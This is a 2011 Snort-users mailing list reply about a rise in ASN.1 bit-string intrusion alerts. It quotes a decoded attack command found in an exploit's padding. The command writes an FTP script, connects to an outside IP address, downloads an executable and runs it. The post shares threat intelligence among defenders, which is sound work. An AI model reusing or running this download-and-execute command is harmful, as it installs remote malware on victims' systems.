[Snort-users] Increase in ASN.1 alerts

Michael Scheidell michael.scheidell at ...8144...
Wed Feb 2 20:52:55 EST 2011


On 2/2/11 12:53 PM, Joe Gedeon wrote:
> Has anyone else noticed an increase in the number of alerts for
> SPECIFIC-THREATS ASN.1 constructed bit string?  The payload seems
> different than the kill-bill script.
>
yep, over the weekend.
one of our new guys decided to decode it, and got this:

combined the payloads from the ASN.1 and the NOOPs, decoded it and found 
the following command buried in the overflow padding....

cmd /c echo open 210.134.62.199 21 > o&echo user 1 1 >> o &echo get 
Rewetsr.exe >> o &echo quit >> o &ftp -n -s:o &Rewetsr.exe





-- 
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
 >*| *SECNAP Network Security Corporation

    * Certified SNORT Integrator
    * 2008-9 Hot Company Award Winner, World Executive Alliance
    * Five-Star Partner Program 2009, VARBusiness
    * Best in Email Security,2010: Network Products Guide
    * King of Spam Filters, SC Magazine 2008


______________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
______________________________________________________________________  
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20110202/dd9f3bcf/attachment.html>


More information about the Snort-users mailing list